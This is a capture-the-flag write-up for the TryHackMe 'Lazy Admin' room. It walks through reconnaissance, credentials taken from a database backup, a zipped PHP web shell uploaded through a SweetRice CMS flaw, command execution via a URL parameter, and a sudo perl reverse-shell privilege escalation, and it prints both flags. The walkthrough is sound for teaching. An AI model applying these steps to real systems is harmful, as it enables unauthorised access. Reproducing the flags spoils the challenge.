~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • THM lazyadmin


    Reconnaissance:

    nmap -sV -sC -v 10.64.175.255

    PORT STATE SERVICE VERSION

    22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

    ssh-hostkey:
      2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
      256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)

    |_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)

    80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

    |_http-title: Apache2 Ubuntu Default Page: It works

    http-methods:

    |_ Supported Methods: GET HEAD POST OPTIONS

    |_http-server-header: Apache/2.4.18 (Ubuntu)

    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    We first login and look around with ffuf and find /content/as

    Its a login page so we need to find a foothold

    We find /inc/mysql_backup, theres credentials here:

    user: manager

    password: Password123


    Exploitation:

    We use those in /content/as/ to enter the admin dashboard with our crendentials

    1. We go into the upload section and upload php shell but it doesn’t work

    2. However a previously explored CVE mentionned zip files being passed (https://github.com/weekevy/SweetRice-CMS-1.5.1-RCE-Exploit)

    3. So we pass the shell as a zip and select the extract option

    4. We upload our shell at http://10.64.175.255/content/attachment/07c50bb701829fb5aefbd4f47f3cddb2.php add ?cmd=id

    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    We go back a few directory and get the flag at http://10.64.175.255/content/attachment/07c50bb701829fb5aefbd4f47f3cddb2.php?cmd=cat%20../../../../../home/itguy/user.txt

    THM{63e5bce9271952aad1113b6f1ac28a07}

    sudo -l returns

    Matching Defaults entries for www-data on THM-Chal: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

    We’re gonna need a reverse shell here

    We go to pentestmonkey get a php shell wrap the shell with zip send it over and extract

    We catch it with our listener and check the /usr/bin/perl

    Its a rev shell to another IP, the admin just logged here basically, so we change it to our IP and port

    Once the rev shell in /etc/copy.sh points to our address we run perl targetting our /home/itguy/backup.pl (the one we dont need permission to use)

    sudo perl /home/itguy/backup.pl

    whoami

    root

    Next we cd /root & cat root.txt

    THM{6637f41d0177b6f37cb20d775124699f}


    Notes:

    Arbitrary file inclusion is very dangerous and here we use the admin dashboard to insert a malicious zip file and extract & launch it.


    Tools: